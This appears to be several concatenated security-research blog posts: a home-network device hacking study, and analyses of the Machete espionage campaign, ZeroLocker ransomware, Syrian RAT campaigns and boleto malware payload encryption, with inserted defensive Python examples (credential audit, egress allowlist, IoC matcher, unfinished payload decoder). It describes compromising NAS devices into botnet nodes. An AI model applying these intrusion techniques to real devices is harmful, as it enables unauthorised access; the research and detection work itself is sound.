During my research I didn't focus on computers, tablets or cellphones, but rather on all the other devices I have connected to my network at home. To my surprise it turns out that I actually have quite a lot of different things connected to my network. Most of them were home entertainment devices: smart TV, satellite receiver, DVD/Blu-ray player, network storage devices and gaming consoles. I'm also at the moment relocating to a new house, and I've been talking with my local security company. They're suggesting I get the latest alarm system, which connects to the network and can be controlled with my mobile device… After this research, I'm not so sure it's a good idea.
Some of the devices on my network were for example:
- Network-attached storage (NAS) from famous vendor #1
- NAS from famous vendor #2
- Smart TV
- Satellite receiver
- Router from my ISP
Before conducting the research I updated all the devices to the latest firmware version. During this process I also noticed that not all devices had automated update checks, which made the entire process quite tedious. As a consumer I had to manually download and install the new firmware on some of the devices, which was actually not that simple because the new firmware files were not that easy to find, and the entire update process wasn't very suitable for a normal computer user. Another interesting observation was that most of the products had been discontinued more than a year back or simply didn't have any updates available at all. This got me thinking: do these home business and entertainment products only 'live' for about a year before they get discontinued?

The goal
So what am I trying to prove with this research? Let me explain why I think this is important research. When I started this project I soon noticed that I could take several different approaches to the research, but for me the main goal I wanted to achieve was to see how vulnerable our homes really are, and also identify real, practical and relevant attack vectors to prove just that.
In general we're quite good at protecting our endpoints and use security software to help us do so. We also become aware from newspapers and blogs about how to raise our security level. Most people today know what a computer virus is, that we should have strong passwords, and that it's important to install the latest security patches; but do we really think about all aspects? It's quite common for a security researcher to talk about a locked door on a glass house, and I wanted to have a similar approach with this research. I wanted to demonstrate that even with an IT-security mindset we focus on protecting our endpoints, and tend to forget that there are other devices connected to our networks. We want to prevent people hacking or infecting our computers because we don't want our data to be stolen, but we then go home and do a full backup of our data to a device that's even more vulnerable than our computer.
The audience for this research is not only consumers but also companies. We need to understand that EVERYTHING we connect to the network might be a stepping stone for an attacker, or may even become an attacker's invisible 'base' that he/she will use to regain access to your network after its been compromised. Just imagine a scenario where you notice you've been compromised, you do everything in the book to bring it back to normal again, you backup your data, re-install your devices and make sure that the new installation is protected against malicious code and all updates are installed; but then six months later you get compromised again, and all your new data is stolen again… How would that even be possible?
The attacker might have compromised your network storage device and turned it into a backdoor. The malicious software is undetected because there's no protection against malicious code running on that device, and the malicious software cannot be deleted because you don't have permission to access the file system on the device; not even a factory reset would solve the problem. Or it might be that the attacker actually used your compromised smart TV to regain network access to your corporate network, since the TV is connected to the same network as your employees, and there are no network restrictions for the smart TV.
The goal with my research was to try to be the baddie, to use my home entertainment devices for malicious intentions, to actually compromise them and use them as either stepping stones to launch further attacks or as a backdoor in my own network.
What I did not try to do in this report is bash or criticize any vendor; the devices tested during this research were my own personal devices, and that's the reason they were chosen for this project. All vulnerabilities have been reported to the respective vendors, and they're working on solutions for these products. I will not disclose all the vulnerabilities identified in this research, or any technical details about them, because that would only help the bad guys. If you want further technical details regarding the research project feel free to contact us.

The impact
So, I had all these different devices connected to my network, but where was I to start? I decided to begin by defining the attack scenarios I would include in my research rather than just attacking the devices without any criteria. One or more of the following criteria had to be met for a test to be considered successful:
- To obtain access to the device; for example, to get access to files on the network storage devices;
- To obtain administrative access to the device, not just in the administrative interface, but also at the OS level;
- To be able to transform/modify the device for my personal interest (backdoor, stepping stone, etc.).
There are probably loads of other scenarios that could be useful to test, but my time was limited and I simply needed to prove a point. I started out by just fooling around with the web interfaces for the different devices and to my surprise it didn't take long before I had found remotely exploitable command execution vulnerabilities with full administrative permissions at the OS level on both network storage devices.
At this point I asked myself, 'is it really that easy?' I then thought about the two newly discovered vulnerabilities and realized both were in the administrative interface, reachable only after authenticating as the administrative user. I needed the same preconditions as an attacker, so I tried to find vulnerabilities without using any of my access credentials. This was a little harder, but after some poking around I found the main configuration file: it was available remotely to any user on the network. The configuration file stored all the password hashes, which made it really easy to get into the administrative interface again and then use the vulnerabilities I had found before to execute system commands on the device.
After further poking around I found more vulnerabilities, which could also be exploited without authentication to execute system commands as root (highest privileges) on the device. At this point it was more or less game over for both of the network storage devices; I didn't just have access to the entire file system of the devices, it was also very easy for me to infect the devices with some Trojan or backdoor that would turn the devices into zombies in a botnet – or give the attacker a backdoor to, for example, carry out further attacks from the device.
Both compromised devices were running a Linux 2.6.x kernel and a lot of interpreters such as Perl and Python. One of them also had the GNU C compiler installed, which would make an attacker's life much easier. Since one of my attack scenarios was to transform the compromised device into a backdoor, I simply used one of the public IRC bots as my test case. Within seconds I had turned my network storage device into a zombie in a botnet.
This was extremely easy because the compromised network storage device is used to store files, so I could simply upload my malicious file and place it outside the shared folders, somewhere else on the file system. As a result, the owner of the device cannot delete the file without using the same vulnerabilities we used to upload and execute our IRC Trojan.
After researching the network storage devices I had found over 14 vulnerabilities that would allow an attacker to remotely execute system commands with the highest administrative privileges. The two devices did not just have a vulnerable web interface; the local security on the devices was also very poor. The devices had very weak passwords, a lot of configuration files had incorrect permissions, and they also contained passwords in clear text.
To give another example of how bad the local security was, on one of the storage devices the administrative root password was '1'. I understand that these devices are not built with Fort Knox security in mind, but a one-character password is against all reasonable rules.
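The local weaknesses described above (world-readable configuration files, password hashes exposed to anyone who can read them, and trivial or cleartext passwords) are the kind of thing a short audit can catch once you have a shell on the device or a copy of its file system. The script below is an added example (not the author's tooling) that walks a directory tree and reports such files. It builds a constructed sample tree in a temporary directory; the file names, contents and hash in it are illustrative, not taken from any real device, and the credential patterns it searches for are an assumption.

```python
"""
Added example (not part of the original post): audit a directory tree for
the local weaknesses the post describes: files readable by every local user,
credential values stored in clear text (and trivially weak ones), and
crypt(3)-style password hashes that are not protected by permissions.
build_sample_tree() creates a constructed tree imitating a badly configured
NAS; nothing in it comes from a real device.
"""
import os
import re
import stat
import tempfile

# Assumed key names for credentials in config files (an assumption for the demo).
CRED_RE = re.compile(
    r"(?im)^\s*(?:admin_?pass(?:word)?|password|passwd|secret)\s*[=:]\s*(\S+)")
# $1$ (md5), $5$ (sha256), $6$ (sha512), $2a$/$2b$/$2y$ (bcrypt) hashes.
HASH_RE = re.compile(r"\$(?:1|5|6|2[aby]?)\$[^:\s]+")
TRIVIAL = {"1", "admin", "password", "root", "123456", ""}


def world_readable(path):
    """True if the 'other' read bit is set on the file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_tree(root):
    """Walk root and return a sorted list of (relative_path, finding)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            readable = world_readable(path)
            for m in CRED_RE.finditer(text):
                if m.group(1) in TRIVIAL:
                    findings.append((rel, "trivial cleartext password"))
                else:
                    findings.append((rel, "cleartext password"))
            if HASH_RE.search(text) and readable:
                findings.append((rel, "password hashes world-readable"))
            elif readable and CRED_RE.search(text):
                findings.append((rel, "credentials world-readable"))
    return sorted(set(findings))


def build_sample_tree():
    """Create a constructed directory tree imitating a badly configured NAS."""
    root = tempfile.mkdtemp(prefix="nas-audit-")

    def put(rel, content, mode):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(content)
        os.chmod(p, mode)

    # Illustrative contents only; the hash below is not a real password hash.
    put("etc/shadow", "root:$1$abcdefgh$ijklmnopqrstuvwxyz0123:16000:0:99999:7:::\n", 0o644)
    put("etc/nas.conf", "admin_password=1\nsmb_share=/shares/public\n", 0o644)
    put("etc/ftp.conf", "password: Tr0ub4dor&3\n", 0o600)
    put("var/log/boot.log", "kernel 2.6.x booted\n", 0o644)
    return root


if __name__ == "__main__":
    for rel, finding in audit_tree(build_sample_tree()):
        print(f"{finding:32s} {rel}")
```

Point audit_tree at a mounted firmware image or at / on the device itself; a world-readable shadow file or an admin_password=1 line is exactly the precondition that turned an authenticated command-execution bug into an unauthenticated one above.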
Due to the poor security, and the fact that I had access to the file system, it was also very simple to identify several scripts that enabled features in the device which weren't documented anywhere: functions that allowed an external user to enable services and other interesting things on the devices, such as remote admin interfaces (telnetd, sshd). I might write more about these 'hidden' features in a different post because I need to conduct deeper research on these files.
During the research project I stumbled upon some other devices that had 'hidden' features; one of them was the DSL router provided by my ISP. After I logged in using the admin credentials I received from the ISP I could navigate around the web interface. The interface was pretty simple to use, and I quickly noticed how the URL changed when I navigated through the menu. Each function in the menu was assigned a number: the first function in the menu had the number 0, and it incremented by one for each option. The interesting thing was that sometimes a function jumped to an unexpected number and a few numbers were skipped, but when you entered the skipped numbers in the URL address bar you were presented with a menu option that didn't exist in the menu list; the name of that 'hidden' function was displayed in the web interface.
I started to brute-force these numbers and found that there were tons of functions I didn't have access to. I can only assume that my ISP or the vendor has FULL CONTROL over the device and can do anything they want with it, including all the functions I don't have permission to use. Judging by the 'hidden' function names, it seems that the ISP can, for example, create tunnels to connect to any device on the network. Just imagine if these functions fell into the wrong hands. I understand that they are most likely meant to help the ISP provide support, but when you log in with the administrative account you don't have full control over what you consider your own device, and that is quite scary. Especially when some of the functions have equally scary names like 'Web Cameras', 'Telephony Expert Configure', 'Access Control', 'WAN-Sensing' and 'Update'.
Below are some screenshots of these hidden functions.
I'm currently still researching these things to see what the functions really do. If I find anything interesting I'm pretty sure there'll be another blog post.
Meanwhile, I started to examine the other devices connected to my home network. For example, my Dreambox still had the default username and password, which was also the administrative root account on the device! The device runs Linux, which would make it an easy target for an attacker. Most of the other devices were pretty secure, but a full audit of these kinds of devices would be difficult because you need to find alternative ways to determine whether an attack was successful, since you don't have full access to most of the devices.
After a few days of poking around I still hadn't found anything that would cover the three scenarios – nothing really worth mentioning. The research project was also quite difficult to perform because I was auditing my personal devices, and I didn't want to break anything. I had naturally paid for all these devices out of my own pocket!
I had to take a different approach, and at this point I had to get creative. I played with the idea that I'm the attacker, I've already compromised the two network storage devices, so what can I do next? My first thought was to see if I could do something with the media players (smart TV and DVD player), because they most likely read information from the storage devices I'd already compromised. I started looking into potential code execution vulnerabilities in the smart TV and DVD player, but because of the high price I paid for the devices I wasn't able to investigate this further. It wasn't only a question of the wasted money if I were to break my brand new LED smart TV; I also had no idea how I would explain wrecking the telly to the kids. How were they going to watch Scooby Doo?
I decided to stop researching them, and instead spent some time contacting the different vendors to see if the potential vulnerabilities were actually exploitable, working together with them to verify these issues. It's much easier for them to do so since they have access to the source code and can confirm much more quickly whether a vulnerability is valid (and I guess they don't really care if they break any devices).
At first I had some trouble contacting these vendors because on the websites there's little useful contact information for the engineers or C-level people who would be able to help me get through to the appropriate people. After some lurking around and asking people in my professional network I was finally able to get in contact with the people I needed and they were very grateful for the information I could share regarding the vulnerabilities and research approaches.
We are now trying to identify if we would be able to transform the smart TV and DVD/Blu-ray player into the same type of stepping stone and backdoor as the compromised storage devices. More information will be shared on this topic later since this research project is ongoing.
For the most of my life I was a total security junkie, doing everything from working as a penetration tester to a public speaker and adviser for law enforcement agencies. IT security is really one of my biggest passions in life, but for the last few years I seem to have reached a point in my life where I'm actually quite tired of reading the same security bulletins year after year. It's time we start doing something about the problems, and one thing we can do is start talking about security threats that are relevant, and also in a language that will make everyone understand them. We as security experts need to take more responsibility and talk about threats that are relevant today – threats that affect you and me. We also need to come up with smart and simple suggestions, conclusions and solutions on how to mitigate those threats by using the software and technology that we already have.
I've always been fascinated by new vulnerabilities and exploitation techniques, but to be honest, what good does it do only releasing vulnerability information when we're not making people understand the bigger picture. We think that IT security is all about software vulnerabilities and I know that half of this post is only talking about vulnerabilities, but the goal with this research is not to brag about all the undiscovered vulnerabilities I found, or that there are big security problems in the home entertainment product line. There will always be vulnerabilities, and we need to understand that; however, by understanding I don't mean accepting. What I mean is that we need to actually do something about it; we need to know what the impact is and assume that our devices can be, or are already, compromised. We need to start assuming that products are vulnerable and that attackers can and will gain access to them.
I would like to conclude this research by saying that we as individuals and also companies need to understand the risks with network devices. We also need to understand that our information is not secure just because we have a strong password or are running some protection against malicious code. We also need to understand that there are so many things that we do not have control over, and that we are largely in the hands of the software and hardware vendors. It took me less than 20 minutes to find and verify extremely serious vulnerabilities in a device considered to be secure – a device we trust and on which we store all the information we don't want stolen.
I remember when I proposed this research to my boss; he asked me what I thought the outcome would be. I was not developing new security solutions for home entertainment devices; I was only identifying security problems, so the only answer I could give him was that I wanted to conduct this research to make people aware that there is a problem, and that we as individuals need to try and improve our personal security in different ways to how it was done in the past; we need to change our mindset and the whole game!
I would also like to give some feedback to all the vendors out there: we need to come up with a better way to support and secure your products. It's not really acceptable that a product is considered as discontinued after only 12 months; it's not okay to have one character passwords; and it's not okay to think of these devices just as 'entertainment' devices. It's not okay to have a readable configuration file containing all user credentials – especially on a network storage device.
We need to come up with alternative solutions that can help individuals and companies improve their security. This is not a problem you can simply fix by installing a product or security patch; therefore, I would like to end this post by saying that even though the home entertainment industry might not be focused on security, we at KL are, and with just a few simple tips I think we can raise the security level a little bit higher. Hopefully some of the vendors will read this research and improve their software security; but until then, here are some simple tips from my side:
- Make sure all your devices are up to date with all the latest security and firmware updates. This is a problem for a lot of home business and entertainment devices, but it is still the best thing you can do to avoid being at the mercy of known vulnerabilities. It also gives you an indication of whether the devices have any updates at all to install, or if it's considered to be a 'dead' product.
- Make sure that the default username and password are changed; this is the first thing an attacker will try when attempting to compromise your device. Remember that even if it's a 'stupid' product such as a satellite receiver or a network hard drive, the administrative interfaces often have serious vulnerabilities.
- Use encryption, even on the files you store in your network storage device. If you do not have access to an encryption tool, you can simply put your files in a password-protected ZIP file; it's still better than not doing anything at all.
- Most home routers and switches let you set up several different DMZs/VLANs. This means that you can set up your own 'private' network for your network devices, which will restrict network access to and from these devices.
- Use common sense and understand that everything can be hacked, even your hardware devices.
- If you're really paranoid you can always monitor the outbound network traffic from these devices to see if there's anything strange going on, but this does require some technical knowledge. Another good tip is to restrict network devices from accessing sites they're not supposed to access, and only allow them to pull updates and nothing else.
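The last tip, restricting each device to the update servers it legitimately needs and watching what else it talks to, can be turned into a simple check against flow or proxy records. The following is an added example, not code from the original post: it evaluates a per-device egress allowlist over a few constructed flow records and totals the bytes sent to destinations outside each device's allowlist. The device addresses, hostnames and log format are all invented for the example.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed egress policy: each home device may only reach its vendor's
# update hosts. Addresses and hostnames are made up for this example.
EGRESS_POLICY: Dict[str, Set[str]] = {
    "192.168.10.20": {"update.nas-vendor.example"},                            # network storage
    "192.168.10.21": {"firmware.tv-vendor.example", "time.tv-vendor.example"},  # smart TV
    "192.168.10.22": {"update.dreambox-vendor.example"},                       # satellite receiver
}

# Constructed flow records: "src_ip dst_host dst_port bytes_out", as a router
# or DNS-aware flow exporter might log them.
SAMPLE_FLOWS = """\
192.168.10.20 update.nas-vendor.example 443 18220
192.168.10.20 198.51.100.7 8080 524288
192.168.10.21 firmware.tv-vendor.example 443 9011
192.168.10.21 tracker.adnetwork.example 80 4096
192.168.10.22 update.dreambox-vendor.example 80 2048
192.168.10.22 203.0.113.9 6667 1200
192.168.10.99 somewhere.example 443 10
"""


def parse_flows(text: str) -> List[Tuple[str, str, int, int]]:
    """Parse the constructed flow format into (src, dst, port, bytes) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, dst, port, nbytes = line.split()
        flows.append((src, dst, int(port), int(nbytes)))
    return flows


def evaluate_egress(flows: List[Tuple[str, str, int, int]],
                    policy: Dict[str, Set[str]]) -> Dict[str, Dict[str, int]]:
    """Return, per device, the bytes sent to each destination outside its allowlist.

    A device that has no policy entry at all is reported under an
    'unmanaged:' key, so a new or forgotten device on the segment is not
    silently accepted.
    """
    violations: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for src, dst, port, nbytes in flows:
        if src not in policy:
            violations["unmanaged:" + src][f"{dst}:{port}"] += nbytes
        elif dst not in policy[src]:
            violations[src][f"{dst}:{port}"] += nbytes
    return {device: dict(dests) for device, dests in violations.items()}


if __name__ == "__main__":
    for device, dests in evaluate_egress(parse_flows(SAMPLE_FLOWS), EGRESS_POLICY).items():
        for dest, total in dests.items():
            print(f"{device} -> {dest}: {total} bytes outside allowlist")
```

Matching on hostnames rather than IP addresses keeps the policy readable, but it depends on the flow source recording the resolved name; where only IPs are available, the allowlist would have to hold the vendor's address ranges instead.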
Some time ago, a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown, undetected malware. While assisting the customer, we found a very interesting file in the system that is completely unrelated to China and contained no Chinese coding traces. At first look, it pretends to be a Java related application but after a quick analysis, it was obvious this was something more than just a simple Java file. It was a targeted attack we are calling "Machete".
What is "Machete"?
"Machete" is a targeted attack campaign with Spanish speaking roots. We believe this campaign started in 2010 and was renewed with an improved infrastructure in 2012. The operation may be still "active".
The malware is capable of the following cyber-espionage operations:
- Logging keystrokes
- Capturing audio from the computer's microphone
- Capturing screenshots
- Capturing geolocation data
- Taking photos from the computer's web camera
- Copying files to a remote server
- Copying files to a special USB device if inserted
- Hijacking the clipboard and capturing information from the target machine
Most of the victims are located in Venezuela, Ecuador, Colombia, Peru, Russia, Cuba and Spain, among others. In some cases, such as Russia, the target appears to be an embassy of one of the countries on this list.
Targets include high-level profiles, including intelligence services, military, embassies and government institutions.
How does "Machete" operate?
The malware is distributed via social engineering techniques, which include spear-phishing emails and web infections via a fake blog website. We have found no evidence of exploits targeting zero-day vulnerabilities. Both the attackers and the victims appear to be Spanish-speaking.
During this investigation, we also discovered many other files installing this cyber-espionage tool in what appears to be a dedicated spear-phishing campaign. These files display a PowerPoint presentation that installs the malware on the target system once the file is opened. These are the names of the PowerPoint attachments:
- Hermosa XXX.pps.rar
- El arte de la guerra.rar
- Hot brazilian XXX.rar
These files are in reality Nullsoft Installer self-extracting archives and have compilation dates going back to 2008.
A consequence of the embedded Python code inside the executables is that these installers include all the necessary Python libraries as well as the PowerPoint file shown to the victim during the installation. The result is extremely large files, over 3MB.
Here are some screenshots of the mentioned files:
A technically relevant fact about this campaign is the use of Python embedded into the Windows executables of the malware. This is very unusual and offers the attackers no advantage except ease of coding. There is no multi-platform support, as the code is heavily Windows-oriented (in its use of libraries). However, we discovered several clues that the attackers prepared the infrastructure for Mac OS X and Unix victims as well. In addition to Windows components, we also found a mobile (Android) component.
Both attackers and victims speak Spanish natively, as we see it consistently in the source code of the client side and in the Python code.
Indicators of Compromise
Web infections
The following code snippets were found in the HTML of websites used to infect victims:
Also the following link to one known infection artifact:
The following are domains found during the infection campaign. Any communication with them must be considered extremely suspicious.
blogwhereyou.com (sinkholed by Kaspersky Lab)
grannegral.com (sinkholed by Kaspersky Lab)
Creates the file Java Update.lnk pointing to appdata/Jre6/java.exe
Malware is installed in appdata/MicroDes/
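The domain and file indicators above are the kind an incident responder would sweep for across DNS logs and host inventories. The following is an added example, not part of the original post or of Kaspersky Lab's tooling: it matches the two listed domains (including their subdomains, but not look-alike names) against constructed resolver log lines, and matches the listed file artifacts under the user's AppData directory against constructed paths. The log format and the sample paths are invented for the example; the indicators themselves are the ones listed above.

```python
import re
from typing import List, Optional, Tuple

# Domains listed in the post as part of the "Machete" infrastructure.
DOMAIN_IOCS = ("blogwhereyou.com", "grannegral.com")

# Constructed DNS resolver log lines (the format is invented for this example).
SAMPLE_DNS_LOG = """\
2014-08-20T10:01:02Z client=10.0.0.5 query=www.blogwhereyou.com type=A
2014-08-20T10:01:05Z client=10.0.0.5 query=update.example.org type=A
2014-08-20T10:02:11Z client=10.0.0.8 query=cdn.grannegral.com type=A
2014-08-20T10:02:30Z client=10.0.0.8 query=notblogwhereyou.com type=A
2014-08-20T10:03:00Z client=10.0.0.9 query=blogwhereyou.com.example.net type=A
"""

# Constructed host inventory, as a file-collection script might return it.
# The last entry is a legitimate JRE location and must not match.
SAMPLE_PATHS = [
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update.lnk",
    r"C:\Users\victim\AppData\Roaming\Jre6\java.exe",
    r"C:\Users\victim\AppData\Roaming\MicroDes\report.dat",
    r"C:\Program Files\Java\jre6\bin\java.exe",
]

QUERY_RE = re.compile(r"\bquery=(?P<host>[^\s]+)")


def domain_match(hostname: str) -> Optional[str]:
    """Return the IoC domain if hostname is that domain or one of its subdomains.

    A suffix test on "." + domain is used deliberately, so that look-alikes such
    as notblogwhereyou.com or blogwhereyou.com.example.net are not reported.
    """
    host = hostname.lower().rstrip(".")
    for domain in DOMAIN_IOCS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def scan_dns_log(text: str) -> List[Tuple[str, str]]:
    """Return (queried name, matched IoC domain) for every suspicious query."""
    hits = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        matched = domain_match(m.group("host"))
        if matched:
            hits.append((m.group("host"), matched))
    return hits


def path_match(path: str) -> Optional[str]:
    """Return the file IoC a path corresponds to, or None.

    Paths are normalised to forward slashes and lower case; the Jre6 and
    MicroDes indicators are only accepted under an AppData directory, which
    keeps a normal JRE install from matching.
    """
    parts = [p for p in path.replace("\\", "/").lower().split("/") if p]
    if parts and parts[-1] == "java update.lnk":
        return "Java Update.lnk"
    if "appdata" in parts:
        if parts[-2:] == ["jre6", "java.exe"]:
            return "appdata/Jre6/java.exe"
        if "microdes" in parts:
            return "appdata/MicroDes/"
    return None


def scan_paths(paths: List[str]) -> List[Tuple[str, str]]:
    """Return (path, matched IoC) for every path that hits a file indicator."""
    hits = []
    for path in paths:
        matched = path_match(path)
        if matched:
            hits.append((path, matched))
    return hits


if __name__ == "__main__":
    for name, ioc in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"DNS: {name} -> {ioc}")
    for path, ioc in scan_paths(SAMPLE_PATHS):
        print(f"FILE: {path} -> {ioc}")
```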
Running processes: creates the task Microsoft_up
Human part of "Machete"
Language
The first evidence is the language used, both for the victims and attackers, is Spanish.
The victims are all Spanish speaking according to the filenames of the stolen documents.
The language is also Spanish for the operators of the campaign; all the server-side code is written in this language: reportes, ingresar, peso, etc.
Conclusion
The "Machete" discovery shows there are many regional players in the world of targeted attacks. Unfortunately, such attacks have become part of the cyber arsenal of many nations around the world. We can be sure there are other parallel targeted attacks running now in Latin America and other regions.
Kaspersky Lab products detect malicious samples related to this targeted attack as Trojan-Spy.Python.Ragua.
Note: A full analysis of the Machete attacks is available to the Kaspersky Intelligent Services customers. Contact: firstname.lastname@example.org
In recent times we've been seeing a lot of file-encrypting ransomware activity.
One of the new ones we've seen pop up in the last couple of weeks is called ZeroLocker. There are indications that the C&C configuration contains errors that would prevent successful decryption. This is why we urge people, even more strongly than usual, not to pay up.
So far we've observed a limited amount of detections through our Kaspersky Security Network. The actors behind ZeroLocker are initially asking $300 worth of BTC for decrypting the files. This goes up to $500 and $1000 as time passes:
ZeroLocker adds a .encrypt extension to all files it encrypts. Unlike most other ransomware, ZeroLocker encrypts virtually all files on the system rather than a predefined set of file types. It doesn't encrypt files larger than 20MB in size, or files located in directories containing the words "Windows", "WINDOWS", "Program Files", "ZeroLocker" or "Desktop". The malware gets executed at boot from C:\ZeroLocker\ZeroRescue.exe.
Though there's a Bitcoin wallet hardcoded inside the binary the malware tries to fetch a new wallet address from the C&C. This is most likely done to make it more difficult to trace how successful the operation is and where the money goes.
We've gathered several Bitcoin wallet addresses and at the time of writing none had any transactions associated with them. As the C&C server is providing the Bitcoin wallet information it's possible the attackers are able to use a unique wallet for each victim.
The malware generates one random 160-bit AES key to encrypt all the files with. Due to the way the key is generated the key space is somewhat limited, though still large enough to make general brute forcing unfeasible. After encryption the malware runs the cipher.exe utility to remove all unused data from the drive, making file recovery much harder. The encryption key, together with a CRC32 of the computer's MAC address, and the associated Bitcoin wallet is sent to the server.
Interestingly enough, the encryption key along with the other information is sent through a GET request, rather than a POST. This results in a 404 on the server. This could mean that the server is not storing this information, so victims who pay up may well not see their files restored.
Several other URLs that the malware tries to get result in 404s as well, which indicates this particular operation may still be in its infancy. When those errors are fixed we may see ZeroLocker deployed on a larger scale. These operations rely on people paying up. Don't do it. Make sure you have backups instead.
We detect current ZeroLocker samples as Trojan-Ransom.MSIL.Agent.uh.
The geopolitical conflicts in the Middle East have deepened in the last few years. Syria is no exception, with the crisis there taking many forms, and the cyberspace conflict is intensifying as sides try to tilt the struggle in their favor by exploiting cyber intelligence and using distortion.
The Global Research & Analysis Team (GReAT) at Kaspersky Lab has discovered new malware attacks in Syria, using some techniques to hide and operate malware, in addition to proficient social engineering tricks to deliver malware by tricking and tempting victims to open and launch malicious files. The malware files were found on activist sites and social networking forums, some other files were also reported by local organizations like CyberArabs and Technicians for Freedom.
The full report detailing the attacks and related activities can be found here.
A glance at what was discovered
The number of attacks and malicious files being distributed is constantly increasing as the attackers become more organized and proficient. The samples are all based on Remote Administration Trojan Tools (RATs).
The number of malicious files found: 110
The number of domains linked to the attacks: 20
The number of IP addresses linked to the attacks: 47
Masquerading as a reportedly "Government leaked program" that has the names of all wanted people in Syria, the National Security Program conceals a full featured RAT client to steal all sorts of information under one of its buttons.
برنامج الأمن الوطني.exe (The national security program)
Using shockingly disturbing videos to distribute malware
A disturbing video showing injured victims of recent bombings was used on YouTube to appeal to people's fear and prompt them to download a malicious application available on a public file sharing website. After initial analysis, the file named "فضائح .exe" (Scandals.exe) proved to be heavily obfuscated with the commercial utility "MaxToCode" for .NET in order to avoid early detection by antivirus solutions.
If you thought the era of fake antiviruses was over, here comes this newly developed Syrian sample to challenge your beliefs. With the innocent title of "Ammazon Internet Security", this malicious application tries to mimic a security scanner, even including a quite thorough graphical user interface and some interactive functionality.
Total Network Monitor (which is a legitimate application) is inside another sample found, being used with embedded malware for spying purposes. Offering security applications to protect against surveillance is one of the many techniques used by malware writing groups to get users desperate for privacy to execute these dubious programs.
It's also the case with other samples, where social engineering does all the heavy work. Instant messaging applications for desktop operating systems have been used in the past to spread malware and it seems Syrian malware authors have jumped on the bandwagon.
Another of the attacks using social engineering tricks, the sample named Kimawi.exe (Arabic for Chemicals) with a JPG icon, is a RAT file bound to the image Kimawi.jpg. The picture is a previously leaked paper supposedly from the regime in Syria warning military units to prepare for Chemical Attacks. The file is being sent by email to selected victims.
The threat actors are becoming more organized, the number of attacks is increasing and the samples being used are becoming more sophisticated, while also relying extensively on powerful social engineering tricks that many people fall for.
Where are the victims and the attackers?
The victims infected when accessing the hacked forums and social networking sites tend to be ordinary users or activists, or specific targets if they receive the malware via email, Skype, or messages on social networking sites.
The victims are also located outside Syria. We have seen victims of Syrian-based malware in:
- Saudi Arabia
- United Arab Emirates
- United States
The attackers' command and control centers were tracked to IP addresses in Syria, Russia, Lebanon, the US and Brazil.
How many have fallen victim?
We believe the number of victims exceeds 10,000, with some of the files being downloaded more than 2000 times.
The attackers' malware samples and variations have increased dramatically from only a few in Q1 2013 to around 40 in Q2 2014.
What is the impact on victims?
Remote Administration Trojan tools are used to fully compromise the victims' systems. RATs are capable of stealing user credentials in addition to activating camera and microphone functionality.
Are users protected?
Kaspersky detects and blocks all the samples that have been found. They are detected as follows:
More details and analysis of the attacks and malware samples can be found in the full report here.
I'm sure you've read or heard about the malware attacking boletos – the popular Brazilian payment system – and how lots of malicious code is able to modify it, redirecting the amount paid to an account owned by criminals. Despite the fact that some numbers were overestimated by some companies and media outlets, these attacks are of particular interest and the Brazilian bad guys are quickly developing and adopting new techniques. Trust me: everything you read about boleto malware was only the tip of the iceberg; our complete research into this topic will be presented at the next Virus Bulletin conference.
The boleto malware campaigns combine several new tricks to infect and steal from more users. One of the most recent is the use of non-executable and encrypted malware payloads XORed with a 32-bit key and compressed by ZLIB. It's no coincidence that a very similar technique was used by ZeuS GameOver some months ago, but this time the files are using extensions such as .BCK and .JMP, instead of .ENC.
We have evidence of Brazilian criminals cooperating with western European gangs involved with ZeuS and its variants; it's not unusual to find them on underground forums looking for samples, buying new crimeware and ATM/PoS malware. The first results of this cooperation can be seen in the development of new attacks such as the one affecting boleto payments in Brazil.
A typical Brazilian boleto: using web-injection to change the numbers in the ID field is enough to redirect the payment
In February, security expert Gary Warner wrote about a new version of ZeuS campaign that downloads some strange and non-executable .ENC files to the infected machine. Our colleagues at CrySys did a very detailed analysis showing how this is an effective technique for passing through your firewall, webfilters, network intrusion detection systems and many other defenses you may have in place, as a tiny Trojan downloads these encrypted (.ENC) files and decrypts them to complete the infection.
Brazilian cybercriminals decided to use the .JMP extension for files encrypted in the same way, downloaded by several small Trojans used in boleto and Trojan banker campaigns. This is what the beginning of an encrypted file looks like:
After removing the encryption we can see it as a normal PE executable:
The criminals tend to encrypt the big payload files using this technique, as well as some removal tools such as Partizan and big Delphi Trojan bankers that include images of Internet banking pages. The aim is always to encrypt the payload and make it undetectable, so that it's not recognized as a normal portable executable.
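Because the layering is only a repeating 4-byte XOR over a ZLIB stream, an analyst can strip it without the downloader: the ZLIB header is known plaintext that pins two of the four key bytes, and the remaining two are cheap to brute-force, with the stream's own Adler-32 check and the PE "MZ" signature confirming the result. The following is an added example, not code from the original post or from any of the samples it describes. It assumes the payload was compressed first and then XORed (the post does not state the order), and it decodes a sample .JMP-style blob constructed inline from a fake PE header, since no real file is included.

```python
import zlib
from typing import Optional, Tuple

# ZLIB stream headers for the four standard compression levels (byte 1 encodes FLEVEL).
ZLIB_HEADERS = (b"\x78\x9c", b"\x78\xda", b"\x78\x5e", b"\x78\x01")


def xor4(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating 4-byte key, done on big integers for speed."""
    if not data:
        return b""
    stream = (key * (len(data) // 4 + 1))[: len(data)]
    return (int.from_bytes(data, "big") ^ int.from_bytes(stream, "big")).to_bytes(len(data), "big")


def build_sample(payload: bytes, key: bytes) -> bytes:
    """Constructed stand-in for a .JMP file: ZLIB-compress, then XOR (order is an assumption)."""
    return xor4(zlib.compress(payload), key)


def decode_with_key(blob: bytes, key: bytes) -> bytes:
    """Reverse the layering when the 4-byte key is already known."""
    return zlib.decompress(xor4(blob, key))


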